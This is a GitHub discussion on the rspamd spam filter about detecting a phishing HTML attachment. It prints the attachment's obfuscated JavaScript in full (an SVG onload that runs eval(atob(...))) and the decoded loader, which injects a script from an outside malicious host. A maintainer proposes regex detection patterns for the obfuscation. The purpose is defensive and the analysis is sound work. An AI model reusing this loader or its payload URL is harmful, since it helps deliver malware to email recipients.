### DISCUSSION TITLE
detect hidden url in html attachment (javascript/base64)

### DISCUSSION THREAD

**Discussion by sts** [rspamd/rspamd#4738] [Ideas]
Just found a phishing mail with an attachment named `ATT732459017.HTM.`.  File content:

```
<input type="hidden" class="jG3psQ" id="b64e" value="cy5ramFlckBpeG9saXQuY29t"></input> <svg src=xvGOvCfSXyJXcVeGiMZai id="U2xMb2NNPWRvY3VtZW50O1F4V01yQz13aW5kb3dbYXRvYigiWkc5amRXMWxiblEiKV1bYXRvYigiWTNKbFlYUmxSV3hsYldWdWRBIildKCJzY3JpcHQiKTtReFdNckMuc3JjPSJodHRwczovL25vd3NlYXJjaHdnYXQubmV0L2luc3RhbGxlci9ob3N0Mi40L2FkbWluL2pzL21zLnBocCI7d2luZG93WyJkb2MiKyJ1bWUiKyJudCJdLmJvZHkuYXBwZW5kQ2hpbGQoUXhXTXJDKTs=" class="ovL25vd3NlYXJjaHdnYXQubmV0L2luc3RhbGxlci9ob3N0Mi40L2FkbWluL2pzL21zLnBocCI7d2luZG93WyJkb2MiKyJ1bWUiKyJudCJdLmJvZHkuYXBwZW5kQ2hpbGQoUXhXTXJDKTs=" onload="eval(atob(this.id));"></svg>
```

When inspecting the file. I see some javascript decoding base64 content, which dissolves to:

```
SlLocM=document;QxWMrC=window[atob("ZG9jdW1lbnQ")][atob("Y3JlYXRlRWxlbWVudA")]("script");QxWMrC.src="https://nowsearchwgat.net/installer/host2.4/admin/js/ms.php";window["doc"+"ume"+"nt"].body.appendChild(QxWMrC);%
```

Inspecting that url, gives a Google Safe Browsing alert. I wonder whether rspamd can better detect such attachments?

**Comment by fatalbanana** [comment]
Rspamd doesn't speak Javascript so it can't do much about URL extraction here.

Viable approach could be to detect the obfuscation using regex (in a Lua rule) - I don't expect you'd see stuff like `eval(atob(` and `"doc"+"ume"+"nt"` anywhere good.
